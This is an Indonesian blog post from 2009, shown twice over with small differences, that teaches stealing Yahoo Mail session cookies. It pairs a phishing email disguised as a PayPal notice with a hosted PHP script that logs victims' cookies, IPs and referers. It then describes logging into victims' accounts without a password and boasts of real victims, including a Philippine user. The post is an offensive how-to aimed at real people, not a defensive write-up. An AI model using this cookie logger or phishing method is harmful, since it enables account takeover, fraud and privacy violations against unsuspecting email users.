On Selasa, 24 November 2009
Seperti yang telah kita ketahui .. XSS merupakan salah sebuah jenis serangan yang paling berbahaya dalam dunia
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..
Tidak percaya?! Mari kita buktikan :D
Pertama tama anda membutuhkan script ini:
User required to use Internet Explorer to view this file.html>
Yang kemudian perlu anda masukan kedalam file *.html
dan kemudian perlu anda attach dalam sebuah email .. :D
Selain itu andapun memerlukan file *.php yang berisikan script ini:
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '
idu lu ala: ' .$cookie. 'Cookie: '.$cook.'
IP: ' .$ip. '
Referer: '.$referer.'
');
fclose($fp);
?>
Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..
Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain :D
Dalam kasus ini saya menggunakan Paypal Letters :D
Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya :D
Yay !!!
Paypal letters!!!
But.. Is that all ?? :D
OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! :D
Sekarang bagaimana kita memanfaatkan cookie tersebut?!
Mudah saja .. Yang anda perlukan adalah Y dan T .. :D
Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD
woops!!
My bad ..
My victim changed his Pass already ;D
Coba kita gunakan pass pribadi :D
Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!
Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1 :D
Yay!!!
Hhahaha
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..
Tidak percaya?! Mari kita buktikan :D
Pertama tama anda membutuhkan script ini:
User required to use Internet Explorer to view this file.
Yang kemudian perlu anda masukan kedalam file *.html
dan kemudian perlu anda attach dalam sebuah email .. :D
Selain itu andapun memerlukan file *.php yang berisikan script ini:
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '
idu lu ala: ' .$cookie. 'Cookie: '.$cook.'
IP: ' .$ip. '
Referer: '.$referer.'
')
fclose($fp);
?>
Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..
Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain :D
Dalam kasus ini saya menggunakan Paypal Letters :D
Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya :D
Yay !!!
Paypal letters!!!
But.. Is that all ?? :D
OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! :D
Sekarang bagaimana kita memanfaatkan cookie tersebut?!
Mudah saja .. Yang anda perlukan adalah Y dan T .. :D
Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD
woops!!
My bad ..
My victim changed his Pass already ;D
Coba kita gunakan pass pribadi :D
Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!
Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1 :D
Yay!!!
Hhahaha
